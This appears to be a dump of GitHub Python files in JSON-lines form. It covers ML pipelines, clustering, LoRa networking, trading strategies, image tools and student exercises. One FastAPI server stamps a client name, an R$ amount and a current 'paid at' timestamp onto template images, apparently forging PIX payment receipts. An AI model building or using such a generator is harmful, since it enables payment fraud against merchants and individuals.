clone_mlrepo(mlrepo, branch, volume_op.volume)\n train = (\n run_det_and_wait_op(detmaster, config, context)\n .add_pvolumes({\"/src/\": clone.pvolume})\n .after(clone)\n )\n register = (\n register_op(detmaster, train.output, model_name)\n .after(train)\n )\n deploy = create_seldon_op(\n detmaster,\n deployment_name,\n deployment_namespace,\n model_name,\n image,\n ).after(register)\n\n\nif __name__ == \"__main__\":\n # Compiling the pipeline\n kfp.compiler.Compiler().compile(det_train_pipeline, 'train_and_deploy.yaml')\n","repo_name":"determined-ai/works-with-determined","sub_path":"kubeflow_pipelines/create_pipeline.py","file_name":"create_pipeline.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"30111751098","text":"import time\nfrom math import factorial # функция из модуля math\nimport calendar\nfrom datetime import date\n\ndef factorial_recurrent(n): # рекурсивная функция\n if n == 0:\n return 1\n return n * factorial_recurrent(n - 1) \n\ndef factorial_classic(n): # итеративная функция\n f = 1\n for i in range(2, n + 1):\n f *= i\n return f\n\ndef calculate_it(func, *args):\n t1 = time.perf_counter_ns()\n res = func(*args)\n t2 = time.perf_counter_ns()\n return res, t2-t1\n\ndef get_the_fastest_func(funcs, *arg):\n fastest_func = None\n fastest_time = -1\n for func in funcs:\n r, t = calculate_it(func, *arg)\n # show time\n print(func.__name__, t)\n \n if fastest_time < 0 or fastest_time > t:\n fastest_func = func\n fastest_time = t\n return fastest_func\n\ndef for_and_append(): # с использованием цикла for и метода append()\n iterations = 10_000_000\n result = []\n for i in range(iterations):\n result.append(i + 1)\n return result\n\n# с использованием списочного выражения\ndef list_comprehension():\n iterations = 10_000_000\n return [i + 1 for i in range(iterations)]\n\n# с использованием цикла for и метода append()\ndef for_and_append_i(iterable):\n result = []\n for elem in iterable:\n result.append(elem)\n return result\n \n# с использованием списочного выражения\ndef list_comprehension_i(iterable):\n return [elem for elem in iterable] \n\n# с использованием встроенной функции list()\ndef list_function_i(iterable):\n return list(iterable) \n\ndef get_all_mondays(year):\n return [date(year, m, w[0]) for m in range(1, 13) for w in calendar.monthcalendar(year, m) if w[0]]\n\ndef get_all_mondays_append(year):\n mondays = []\n for month in range(1, 13):\n for week in calendar.monthcalendar(year, month):\n monday = week[0]\n if monday:\n mondays.append(date(year, month, monday))\n return mondays\n\n\n\"\"\"\nfuncs = (factorial, factorial_recurrent, factorial_classic)\nfastest_func = get_the_fastest_func(funcs, 10)\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))\n\nfuncs = (for_and_append, list_comprehension)\nfastest_func = get_the_fastest_func(funcs)\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))\n\nfuncs = (for_and_append_i, list_comprehension_i, list_function_i)\nfastest_func = get_the_fastest_func(funcs, range(1_000_000))\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))\n\"\"\"\n\nfuncs = (get_all_mondays_append, get_all_mondays)\nfastest_func = get_the_fastest_func(funcs, 3030)\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))","repo_name":"vepankin/python_stepik","sub_path":"get_fastest_factorial.py","file_name":"get_fastest_factorial.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29638450868","text":"import numpy as np\nimport sys\n\nfrom cure.distance import euclid\n\n\nclass Cluster:\n COUNTER = 0\n\n def __init__(self, X, x_ids, n_reps, a):\n Cluster.COUNTER += 1\n self.id = Cluster.COUNTER\n self.X = np.array(X)\n self.n_samples, self.n_features = self.X.shape\n self.x_ids = x_ids\n self.n_reps = n_reps\n self.a = a\n self.mean = self.X.sum(axis=0)/(self.n_samples)\n self.reps = self.assign_reps()\n self.closest = None\n self.closest_distance = sys.maxsize\n\n def assign_reps(self):\n print('Определим точки-представители')\n if self.n_samples <= self.n_reps:\n print(f'Требуемое кол-во представителей не привышает множество точек кластера {self.id}.',\n f'Значит все точки - представители:', np.around(self.X))\n return self.X\n tmp_set = set()\n reps = []\n print(f'Всего в классе {len(self.X)} точек > {self.n_reps}.')\n print('Значит нужно вычислить точек-представителей для кластера', self.id)\n for i in range(self.n_reps):\n max_dist = 0\n for j in range(self.n_samples):\n if i == 0:\n min_dist = euclid(self.X[j], self.mean)\n else:\n min_dist = euclid(reps, self.X[j], axis=1).min()\n if min_dist >= max_dist:\n max_dist = min_dist\n max_point = j\n print('Найдена точка-представитель:', np.around(self.X[max_point]))\n if max_point not in tmp_set:\n tmp_set.add(max_point)\n if reps is not None:\n point = self.X[max_point]\n reps.append(point + self.a * (self.mean - point))\n else:\n point = self.X[max_point]\n reps = [point + self.a * (self.mean - point)]\n print('Точки-представитель',\n np.around(point), 'сдвигаем к центру:')\n print(f'{point} + {self.a} * ({np.around(self.mean, 5)} - {point})',\n reps[-1], sep=' = ')\n return np.array(reps)\n\n def distance_from_point(self, point):\n return euclid(self.reps, point, axis=1).min()\n","repo_name":"ankkarp/psppr2","sub_path":"cure/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19273985885","text":"# encoding: utf-8\n\nimport logging\n\nLOG_FILE = 'authserv.log'\nLOG_FMT = '%(asctime)s %(name)-15s %(levelname)-7s %(message)s'\nLOG_DATEFMT = '%y-%m-%d %H:%M:%S'\n\ndef setupLogging(consolelevel=logging.INFO, logfile=LOG_FILE):\n '''\n sets up the logger such that:\n debug+ -> file\n info+ -> console\n '''\n logging.basicConfig(\n level = logging.DEBUG,\n format = LOG_FMT,\n datefmt = LOG_DATEFMT,\n filename = logfile,\n filemode = 'w'\n )\n # log to console\n consolelog = logging.StreamHandler()\n consolelog.setLevel(consolelevel)\n consolelog.setFormatter(logging.Formatter(LOG_FMT, LOG_DATEFMT))\n logging.getLogger().addHandler(consolelog)","repo_name":"mcnz/authserv","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38714747628","text":"from pathlib import Path\nfrom pydantic import BaseModel\n\nimport os\nimport cv2\nfrom numpy import ndarray\nfrom base64 import b64encode\n\nimport asyncio\nfrom io import BytesIO\nfrom datetime import datetime\n\nfrom functools import wraps\nfrom typing import NamedTuple, Callable, Coroutine, Tuple, Dict, Any\n\nfrom fastapi.responses import Response\nfrom fastapi import FastAPI, HTTPException, Depends\n\napplication = FastAPI()\n\nBASE_DIR = Path(__file__).parent\nIMAGES_PATH = BASE_DIR / 'images'\n\nif not os.path.exists(IMAGES_PATH):\n os.mkdir(IMAGES_PATH)\n\n\nclass ImageDoesNotExistException(Exception):\n pass\n\n\nclass ImageCannotBeSavedException(Exception):\n pass\n\n\ndef sync_to_async(function: Callable) -> Coroutine:\n\n @wraps(function)\n async def wrapper(*args: Tuple, **kwargs: Dict) -> Any:\n return await asyncio.to_thread(function, *args, **kwargs)\n\n return wrapper\n\n\nclass GenerateImageInput(BaseModel):\n image_name: str\n client_name: str\n pix: str\n\n\ndef get_image_path(image_name: str) -> str:\n image_name = image_name.lower()\n\n for image in os.listdir(IMAGES_PATH):\n if image.lower().startswith(image_name):\n return str(IMAGES_PATH / image)\n\n raise ImageDoesNotExistException(f\"{image_name} does not exist\")\n\n\nclass DataToPutOnImage(NamedTuple):\n text: str\n position: Tuple\n size: float\n\n\ndef put_label_on_image(\n image: ndarray,\n data_to_put_on_image: DataToPutOnImage\n) -> None:\n\n cv2.putText(\n image,\n data_to_put_on_image.text,\n data_to_put_on_image.position,\n cv2.FONT_HERSHEY_DUPLEX,\n data_to_put_on_image.size,\n (0, 0, 0),\n 2\n )\n\n\ndef put_labels_on_image(\n image: ndarray,\n image_data: GenerateImageInput\n) -> None:\n\n put_label_on_image(image, DataToPutOnImage(\n text=f\"Cliente: {image_data.client_name}\".upper(),\n position=(10, 410),\n size=0.8\n ))\n\n put_label_on_image(image, DataToPutOnImage(\n text=image_data.pix,\n position=(60, 500),\n size=3\n ))\n\n put_label_on_image(image, DataToPutOnImage(\n text='R$',\n position=(10, 500),\n size=1\n ))\n\n put_label_on_image(image, DataToPutOnImage(\n text=datetime.now().strftime(\"Pago em %H:%M:%S %d/%m/%Y\"),\n position=(10, 540),\n size=0.75\n ))\n\n\ndef write_image_to_buffer(image: ndarray) -> BytesIO:\n is_success, encoded_image = cv2.imencode('.jpg', image)\n\n if is_success:\n return BytesIO(encoded_image)\n\n raise ImageCannotBeSavedException()\n\n\ndef convert_buffer_to_base64(buffer: BytesIO) -> str:\n return b64encode(buffer.getvalue()).decode('utf-8')\n\n\n@sync_to_async\ndef generate_image_in_base64(image_data: GenerateImageInput) -> BytesIO:\n image = cv2.imread(get_image_path(image_data.image_name))\n put_labels_on_image(image, image_data)\n return convert_buffer_to_base64(write_image_to_buffer(image))\n\n\n@application.get('/generate_image/')\nasync def generate_image_controller(\n image_data: GenerateImageInput = Depends()\n) -> Response:\n\n try:\n base64_image = await generate_image_in_base64(image_data)\n except (ImageDoesNotExistException, ImageCannotBeSavedException) as error:\n raise HTTPException(status_code=400, detail=str(error))\n except Exception as error:\n raise HTTPException(\n status_code=409,\n detail=f\"Unexpected error: {str(error)}\"\n )\n else:\n return Response(content=base64_image)\n","repo_name":"SarahLightBourne/image-generator","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31852506525","text":"from network import LoRa\nimport socket\nimport time\nimport ubinascii\nimport pycom\nclass Lora:\n # Update these!\n APP_KEY = \"APP KEY\" # Application key from the things network SAM\n APP_EUI = \"APP EUI\" # The EUI for the app SAM\n DEV_EUI = \"DEV EUI\"\n JOIN_TIMEOUT = 30 # passed to the LoRaWAN join function.\n \n\n def connect(self):\n # config = config_template()\n pycom.heartbeat(False)\n pycom.rgbled(0xf00000) # Make the LED red\n print(\"Connecting to Lora\")\n\n # United States = LoRa.US915\n self.lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.US915, device_class=LoRa.CLASS_A)\n\n # Setting up channels for sub-band 2\n self.lora.add_channel(index=8, frequency=903900000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=9, frequency=904100000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=10, frequency=904300000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=11, frequency=904500000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=12, frequency=904700000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=13, frequency=904900000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=14, frequency=905100000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=15, frequency=905300000, dr_min=0, dr_max=3)\n # Remove all other channels\n for index in range(0, 7):\n self.lora.remove_channel(index)\n for index in range(16, 72):\n self.lora.remove_channel(index)\n\n # create an OTAA authentication parameters\n app_eui = ubinascii.unhexlify(self.APP_EUI)\n app_key = ubinascii.unhexlify(self.APP_KEY)\n dev_eui = ubinascii.unhexlify(self.DEV_EUI)\n # join a network using OTAA (Over the Air Activation)\n self.lora.join(activation=LoRa.OTAA, auth=(dev_eui, app_eui, app_key), timeout=0)\n\n # wait until the module has joined the network\n count = 0 \n while not self.lora.has_joined():\n time.sleep(2.5)\n print('Not yet...'+ str(count))\n count += 1\n\n pycom.rgbled(0x008000) # Make the LED green\n print(\"Joined Lora Network\")\n \n def create_socket(self):\n s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n\n # set the LoRaWAN data rate\n s.setsockopt(socket.SOL_LORA, socket.SO_DR, 3)\n\n def send(self, msg):\n s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n s.setsockopt(socket.SOL_LORA, socket.SO_DR, 3)\n s.setblocking(True)\n # msg_bytes = bytearray()\n # msg_bytes = msg.encode()\n s.send(msg.encode())\n s.close()\n\n def getStatus(self):\n if self.lora.has_joined():\n return 0\n return 1\n","repo_name":"samlarsen18/lora_project","sub_path":"pytrack_flash/lora_functions.py","file_name":"lora_functions.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38271892935","text":"'''\nStandard raster plot\n'''\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nfrom jaratoolbox import settings\nfrom jaratoolbox import celldatabase\nfrom jaratoolbox import behavioranalysis\nfrom jaratoolbox import spikesanalysis\nfrom jaratoolbox import extraplots\nfrom jaratoolbox import ephyscore\nfrom jaratoolbox import spikesorting\nimport studyparams\n\ndbPath = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME)\ndbFilename = os.path.join(dbPath,'celldb_{}.h5'.format(studyparams.STUDY_NAME))\n\nfigFormat = 'png'\noutputDir = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME,'reports')\n\n# -- Load the database of cells --\ncelldb = celldatabase.load_hdf(dbFilename)\nnumber_of_clusters = len(celldb) - 1\n\nfor indRow,dbRow in celldb[266:267].iterrows():\n oneCell = ephyscore.Cell(dbRow)\n timeRange = [-0.1, 0.4] # In seconds\n\n ephysDataStd, bdataStd = oneCell.load('standard')\n spikeTimesStd = ephysDataStd['spikeTimes']\n eventOnsetTimesStd = ephysDataStd['events']['stimOn']\n (spikeTimesFromEventOnsetStd,trialIndexForEachSpikeStd,indexLimitsEachTrialStd) = \\\n spikesanalysis.eventlocked_spiketimes(spikeTimesStd, eventOnsetTimesStd, timeRange)\n\n frequenciesEachTrialStd = bdataStd['currentFreq']\n numberOfTrialsStd = len(frequenciesEachTrialStd)\n arrayOfFrequenciesStd = np.unique(bdataStd['currentFreq'])\n arrayOfFrequenciesStdkHz = arrayOfFrequenciesStd/1000\n labelsForYaxis = ['%.1f' % f for f in arrayOfFrequenciesStdkHz]\n trialsEachCondStd = behavioranalysis.find_trials_each_type(frequenciesEachTrialStd,\n arrayOfFrequenciesStd)\n\n extraplots.raster_plot(spikeTimesFromEventOnsetStd,indexLimitsEachTrialStd,\n timeRange, trialsEachCondStd, labels=labelsForYaxis)\n plt.xticks(fontsize=16)\n plt.yticks(fontsize=16)\n plt.xlabel('Time from event onset [s]', fontsize=18)\n plt.ylabel('Frequency [kHz]', fontsize=18)\n plt.title('Standard Sequence ({} Trials)'.format(numberOfTrialsStd))\n\n '''\n Saving the figure --------------------------------------------------------------\n '''\n figFilename ='{}_{}_{}um_T{}_c{}_stdraster.{}'.format(dbRow['subject'],dbRow['date'],dbRow['depth'],\n dbRow['tetrode'],dbRow['cluster'],figFormat)\n figFullpath = os.path.join(outputDir,figFilename)\n plt.savefig(figFullpath,format=figFormat)\n plt.gcf().set_size_inches([6,4])\n\n plt.tight_layout()\n plt.show()\n","repo_name":"sjara/jaratest","sub_path":"beth/ssa/graph_stdraster.py","file_name":"graph_stdraster.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73522934247","text":"import cv2\nimport os\nimport json\nimport numpy as np\nfrom PIL import Image\n\nclass np_im(object):\n def __init__(self, outputs, PATH_im, filename):\n self.outputs=outputs\n self.PATH_im=PATH_im\n self.filename=filename\n \n def create(self):\n l=self.outputs['instances']\n for i in range(len(l)):\n a=l[i].get_fields()\n q=a['pred_masks']\n q=q.tolist()\n \n for j in range(len(q[0])):\n for k in range(len(q[0][j])):\n if q[0][j][k]==True:\n q[0][j][k]=255\n if q[0][j][k]==False:\n q[0][j][k]=0 \n \n q[0][j]=np.array(q[0][j])\n \n q[0] = np.array(q[0], dtype=np.uint8)\n data = q[0]\n img = Image.fromarray(data)\n img.save(os.path.join(self.PATH_im,str(self.filename)+'_instance_'+str(i)+'.png'))\n img.show()\n \n \n","repo_name":"Has970211/Object-detection","sub_path":"ObjectDetection_detectron2/Numpy_image/nmpy_img.py","file_name":"nmpy_img.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18068473143","text":"# import the necessary packages\n# To access the GUI Functionality\nfrom tkinter import *\nfrom tkinter import filedialog\n# PIL(photo imaging Library) allows displaying JPEG/JPG and PNG\nfrom PIL import Image\nfrom PIL import ImageTk\n# To use OpenCV\nimport cv2\n\n\ndef adjust_size(image):\n \"\"\"Downscaling the image while preserving the Aspect Ratio\"\"\"\n global width, height\n scale_percent = 90 # percent of original size\n width = int(image.shape[1] * scale_percent / 100)\n height = int(image.shape[0] * scale_percent / 100)\n\n\ndef display_image(image):\n \"\"\"Performs the necessary pre-processing to display the image with Tkinter\"\"\"\n global image_panel\n\n image = Image.fromarray(image) # convert the images to PIL format\n image = ImageTk.PhotoImage(image) # and then to ImageTk format\n\n if image_panel is None: # if the panels are None, initialize them\n image_panel = Label(image=image)\n image_panel.image = image # prevent Python’s garbage collection routines from deleting the image\n image_panel.pack()\n else: # otherwise, update the image panels\n image_panel.configure(image=image) # update the image label\n image_panel.image = image\n image_panel.pack()\n\n\ndef select_image():\n \"\"\"Load and display the RGB image to be fitted on the screen\"\"\"\n # grab a reference to the image path, width and height\n global path, width, height\n # open a file chooser dialog and allow the user to select an input image\n path = filedialog.askopenfilename()\n\n if len(path) > 0: # ensure a file path was selected\n image = cv2.imread(path) # load the image from path\n height, width = image.shape[:2] # image height and width\n while height > 550 or width > 1024:\n adjust_size(image) # adjust the resolution to fit the screen\n image = cv2.resize(image, (width, height))\n # PIL/Pillow represents images in RGB order\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n display_image(image)\n\n\ndef threshold_slider(*args):\n \"\"\"Updates the binary threshold image dynamically based on the slider value\"\"\"\n if len(path) > 0:\n image = cv2.imread(path)\n image = cv2.resize(image, (width, height))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n # Reads the current threshold value from slider\n th_val = slider.get()\n # applying binary threshold on the grayscale image\n # all pixel values above threshold will be set to 255(white)\n retval, th_image = cv2.threshold(gray, th_val, 255, cv2.THRESH_BINARY)\n display_image(th_image)\n\n\ndef show_grayscale():\n \"\"\"Displays the grayscale image on screen when user presses the corresponding button\"\"\"\n if len(path) > 0:\n image = cv2.imread(path)\n image = cv2.resize(image, (width, height))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n display_image(gray)\n\n\n# Global Variables\nimage_panel, path, width, height = None, '', 0, 0\n\n# initialize the main window\nroot = Tk()\nroot.title(\"Adaptive Binary Thresholding\")\n\n# Image Selection button widget\nselect_btn = Button(root, text=\"Select an image\", command=select_image)\nselect_btn.pack(side=\"bottom\")\n\n# Display Grayscale image button widget\ngray_button = Button(root, text=\"Show Grayscale\", command=show_grayscale)\ngray_button.pack()\n\n# Description text of binary threshold label widget\nlabel = Label(root, text=\"Move the scale to adjust the binary threshold\")\nlabel.pack()\n\n# Adaptive Threshold scale widget\nslider = Scale(root, from_=0, to=255, length=400, resolution=1, orient=HORIZONTAL, command=threshold_slider)\nslider.set(127)\nslider.pack()\n\n# kick off the GUI\nroot.mainloop()\n","repo_name":"itkhanz/Binary-Threshold-Tool","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21391306339","text":"\"\"\"Test handlebars else tag.\n\npoetry run pytest tests/test_handlebars/test_else.py\n\"\"\"\nimport pytest\n\nfrom src.djlint.reformat import formatter\nfrom tests.conftest import printer\n\ntest_data = [\n pytest.param(\n (\"{{^}}\"),\n (\"{{^}}\\n\"),\n id=\"else_tag\",\n ),\n]\n\n\n@pytest.mark.parametrize((\"source\", \"expected\"), test_data)\ndef test_base(source, expected, handlebars_config):\n output = formatter(handlebars_config, source)\n\n printer(expected, source, output)\n assert expected == output\n","repo_name":"Riverside-Healthcare/djLint","sub_path":"tests/test_handlebars/test_else.py","file_name":"test_else.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"53"} +{"seq_id":"42407068598","text":"import streamlit as st\nimport tensorflow as tf\nfrom io import BytesIO\nfrom PIL import Image\nimport numpy as np\nfrom streamlit_lottie import st_lottie\nimport requests\n\nst.set_page_config(page_title='Leaf Disease Detection', page_icon=':leaves:')\n\n# Load the pre-trained model\nmodel=tf.keras.models.load_model('C:\\\\Users\\\\digital\\\\Desktop\\\\training1\\\\app_model (1).h5')\n\nCLASS_NAMES = [\n 'Potato_Early_blight',\n 'Potato_late_blight',\n 'Potato_healthy'\n ]\n\n# Dictionary of diseases and their remedies\nremedies = {\n \"Potato_Early_blight\": \"Remove infected leaves and use copper fungicides. Apply mulch to keep the soil moisture consistent.\",\n \"Potato_late_blight\": \"Copper-based fungicides along with organic remedies like neem oil and garlic extracts can also be used to control the spread of late blight in potato plants\",\n \"Potato_healthy\": \"Your leaf looks healthy! Keep up the good work!\"\n \n}\n\n\n# Define the Streamlit app\nst.title(\"Protect your plants, the smart way!! \")\n# Upload the image\nupload_file = st.file_uploader('Upload a image', type= [\"png\", \"jpg\",\"jpeg\"])\n\n\n\n\n\nif upload_file is not None:\n \n image = Image.open(upload_file)\n #image =image.resize((180, 180), resample=Image.BILINEAR)\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n \n #preprocess the image\n img = np.array(image.resize((256, 256)))\n img = np.expand_dims(img, axis=0)\n \n \n\n #make preduction using the model\n predictions = model.predict(img)[0]\n predicted_class = np.argmax(predictions)\n\n\n #get the predicted disease and its corresponding remedies\n predicted_disease = list(remedies.keys())[predicted_class]\n prediction_confidence = np.max(predictions)\n predicted_remedy = remedies[predicted_disease]\n\n\n\n #show the predicted disease and remedies\n st.write(\"The predicted disease is: \" + predicted_disease)\n st.write(\"Confidence:\", prediction_confidence)\n st.write(\"The remedy for this disease is: \" + predicted_remedy)\n\n\n \n \n\n \n\n\n \n \n\n\n\n \n\n\n \n ","repo_name":"ssom01-github/Leaf_diagnosis","sub_path":"Multipages/pages/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73896311208","text":"# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom pandas import DataFrame\nimport talib.abstract as ta\n\n\n# --------------------------------\n\n\nclass adx_opt_strat(IStrategy):\n \"\"\"\n author@: Gert Wohlgemuth\n converted from:\n https://github.com/sthewissen/Mynt/blob/master/src/Mynt.Core/Strategies/AdxMomentum.cs\n \"\"\"\n\n # Minimal ROI designed for the strategy.\n # adjust based on market conditions. We would recommend to keep it low for quick turn arounds\n # This attribute will be overridden if the config file contains \"minimal_roi\"\n minimal_roi = {\n \"0\": 0.0692,\n \"7\": 0.02682,\n \"10\": 0.00771,\n \"32\": 0\n }\n\n # Optimal stoploss designed for the strategy\n stoploss = -0.32766\n\n # Trailing stoploss\n trailing_stop = True\n trailing_only_offset_is_reached = True\n trailing_stop_positive = 0.32634\n trailing_stop_positive_offset = 0.34487 \n\n # Optimal ticker interval for the strategy\n ticker_interval = '1m'\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n dataframe['adx'] = ta.ADX(dataframe, timeperiod=14)\n dataframe['plus_di'] = ta.PLUS_DI(dataframe, timeperiod=25)\n dataframe['minus_di'] = ta.MINUS_DI(dataframe, timeperiod=25)\n dataframe['sar'] = ta.SAR(dataframe)\n dataframe['mom'] = ta.MOM(dataframe, timeperiod=14)\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n dataframe.loc[\n (\n (dataframe['mom'] < 0) &\n (dataframe['minus_di'] > 48) &\n (dataframe['plus_di'] < dataframe['minus_di'])\n\n ),\n 'buy'] = 1\n \n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n dataframe.loc[\n (\n (dataframe['mom'] > 0) &\n (dataframe['minus_di'] > 48) &\n (dataframe['plus_di'] > dataframe['minus_di'])\n\n ),\n 'sell'] = 1\n return dataframe","repo_name":"davidzr/freqtrade-strategies","sub_path":"strategies/adx_opt_strat/adx_opt_strat.py","file_name":"adx_opt_strat.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"21822322308","text":"import numpy as np\n\ndef minmax(x):\n if (isinstance(x, np.ndarray) == True):\n x = np.squeeze(x)\n if (x.ndim == 1 and len(x) != 0):\n new = []\n if (np.max(x) - np.min(x) != 0):\n for t in x:\n new.append((float(t - np.min(x)) ) / (float(np.max(x) - np.min(x))))\n return np.array(new)\n return None\n\nif __name__ == '__main__':\n\n X = np.array([0, 15, -9, 7, 12, 3, -21]).reshape((-1, 1))\n print(minmax(X))\n Y = np.array([2, 14, -13, 5, 12, 4, -19]).reshape((-1, 1))\n print(minmax(Y))","repo_name":"yodana/ml01","sub_path":"ex06/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16323187634","text":"# Projede ilk olarak url'ler ayarlanmalıdır.\nfrom django.urls import path # Django ile alakalı Pylance(reportMissingModuleSource) hatası alındığında Pylance kütüphanesi, Extensions bölümünden disable yapılmalıdır.\nfrom . import views \nurlpatterns = [\n path('',views.homepage,name=\"home\"),\n path('developer/',views.developer,name=\"developer\"),\n path('about/',views.about,name=\"about\"),\n path('create/',views.create,name=\"create\"),\n path('delete/',views.delete,name=\"delete\"),\n path('yes_finish/',views.yes_finish,name=\"yes_finish\"),\n path('no_finish/',views.no_finish,name=\"no_finish\"),\n path('update/',views.update,name=\"update\"),\n \n # \"\"\"\n # # path('', views.home), \n # Bu sayfa, template olmadan request yapıldığında karşılaşılan sayfadır.\n # \"\"\"\n \n \n]","repo_name":"yasinramazangok/MyAgenda","sub_path":"Myagenda/agenda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19380948293","text":"# Course: IT1 1120\n# Assignment number: 2\n# Family name, Given name: Tara, Sahil\n# Student number: 300018569\n\n########################\n# Question 1\n########################\ndef min_enclosing_rectangle(radius, x, y):\n \"\"\"(number, number, number) -> (number, number) or None\n\n Preconditions: radius >= 0\n \n Return the x and y of the bottom left corner of the rectangle\n enclosing a circle with a radius of radius and centered about x, y.\n If radius is negative returns nothing.\n \"\"\"\n if radius >= 0:\n return(x-radius, y-radius)\n \n########################\n# Question 2\n########################\ndef series_sum():\n \"\"\"(None) -> number or None\n\n Preconditions: n given by user is a non negative integer\n \n Return the sum of the series 1000 + (1/1)^2 + (1/2)^2 + (1/3)^2 (1/n)^2.\n if entered number is negative returns nothing.\n \"\"\"\n n = int(input(\"Please enter a non-negative integer: \"))\n sumer = 1000\n if n >= 0:\n for i in range(1, n + 1):\n sumer += 1/i ** 2\n return sumer\n \n########################\n# Question 3\n########################\ndef pell(n):\n \"\"\"(int) -> int or None\n\n Preconditions: n >= 0:\n \n Returns nth pell number if n >= 0 returns nothing otherwise.\n \"\"\"\n if n >= 0:\n second_last = 0\n last = 1\n answer = 0\n if n == 0:\n answer = 0\n elif n == 1:\n answer = 1\n elif n > 1:\n for i in range(2, n + 1):\n answer = 2 * last + second_last\n if i < n:\n second_last = last\n last = answer\n return answer\n########################\n# Question 4\n########################\ndef countMembers(s):\n \"\"\"(str) -> int\n\n Returns the number of extraordinary characters within a string.\n Extraordinary numbers are:\n F to X upper cased letters,\n e to j lower cased,\n Numerals between 2 and 6,\n \"!\",\n \",\",\n and \"\\\".\n \"\"\"\n num = 0\n for ch in s:\n if ch in \"FGHIJKLMNOPQRSTUVWXefghij23456!\\\\,\":\n num += 1\n return num\n\n########################\n# Question 5\n########################\ndef casual_number(s):\n \"\"\"(str) -> int or None\n Return nothing if s is not a number.\n Return comma-less integer from s if s is a number.\n \"\"\"\n s = s.replace(\",\", \"\")\n if s[1:].isnumeric():\n return int(s)\n\n########################\n# Question 6\n########################\ndef alienNumbers(s):\n \"\"\"(str) -> int\n Return the alien number for a string s where T=1024,y=598,!=121, a=42, N=6, U=1\n \"\"\"\n return s.count(\"T\") * 1024 + s.count(\"y\") * 598 + s.count(\"!\") * 121 + s.count(\"a\") * 42 + s.count(\"N\") * 6 + s.count(\"U\")\n\n########################\n# Question 7\n########################\ndef alienNumbersAgain(s):\n \"\"\"(str) -> int\n Return the alien number for a string s where T=1024,y=598,!=121, a=42, N=6, U=1 without the use of string functions.\n \"\"\"\n num = 0\n for ch in s:\n if ch == \"T\":\n num += 1024\n elif ch == \"y\":\n num += 598\n elif ch == \"!\":\n num += 121\n elif ch == \"a\":\n num += 42\n elif ch == \"N\":\n num += 6\n elif ch == \"U\":\n num += 1\n return num\n\n########################\n# Question 8\n########################\ndef encrypt(s):\n \"\"\"(str) -> str\n Returns an encrypted version of s.\n \"\"\"\n s = s[::-1]\n encrypted = \"\"\n length = len(s)\n if length <= 1:\n encrypted = s\n else:\n for i in range(length // 2):\n encrypted += s[i] + s[length - i - 1]\n if length % 2 != 0:\n encrypted += s[length // 2]\n return encrypted\n\n########################\n# Question 9\n########################\ndef oPify(s):\n \"\"\"(str) -> str\n Returns a string with the 